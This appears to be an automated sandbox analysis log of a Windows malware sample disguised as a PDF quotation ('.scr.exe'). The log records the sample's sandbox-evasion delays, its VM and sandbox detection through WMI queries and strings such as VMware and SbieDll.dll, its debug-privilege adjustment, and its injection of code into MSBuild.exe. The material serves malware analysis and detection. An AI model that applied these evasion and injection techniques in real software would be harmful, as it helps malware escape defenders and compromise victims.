Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595515s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe TID: 7608	Thread sleep time: -595414s >= -30000s			Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7520	Thread sleep count: 85 > 30			Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7720	Thread sleep count: 90 > 30			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep count: 39 > 30			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -35971150943733603s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -600000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 1508	Thread sleep count: 1854 > 30			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599891s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 1508	Thread sleep count: 7974 > 30			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599781s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599672s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599563s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599438s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599313s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599188s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -599078s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598969s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598844s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598735s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598610s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598485s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598360s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598235s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -598110s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597996s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597875s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597758s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597633s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597516s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597406s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597297s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597188s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -597078s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596969s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596844s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596735s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596610s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596485s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596360s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596235s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -596110s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595985s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595860s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595735s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595610s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595485s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595360s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595235s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -595110s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594985s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594860s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594735s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594610s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594485s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594360s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594235s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6044	Thread sleep time: -594110s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 100000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99890			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99782			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99657			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99547			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99438			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99313			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99188			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 99063			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98938			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98828			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98718			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98609			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98500			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98391			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98266			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98155			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 98047			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97938			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97813			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97688			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97578			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97469			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97328			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97219			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97109			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 97000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96891			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96781			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96672			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96563			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96438			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96313			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 96188			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596843			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596731			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596609			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596500			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596390			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596281			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596171			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 596062			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595953			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595843			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595734			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595625			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595515			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 595414			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599563			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599438			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599313			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599078			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598844			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597996			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597758			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597633			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597516			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597406			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597297			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110			Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$2
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorer?SbieDll.dll@select * from Win32_BIOS8Unexpected WMI query failureAversionBSerialNumberDVMware|VIRTUAL|A M I|XenEselect * from Win32_ComputerSystemFmanufacturerGmodelHMicrosoft|VMWare|VirtualIjohnJannaKxxxxxxxx
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft|VMWare|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: osoft|VMWare|Virtual
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333007835.0000013735F39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2342583727.0000013750340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Thread register set: target process: 8188

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140002000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140044000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: CC9263D010			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
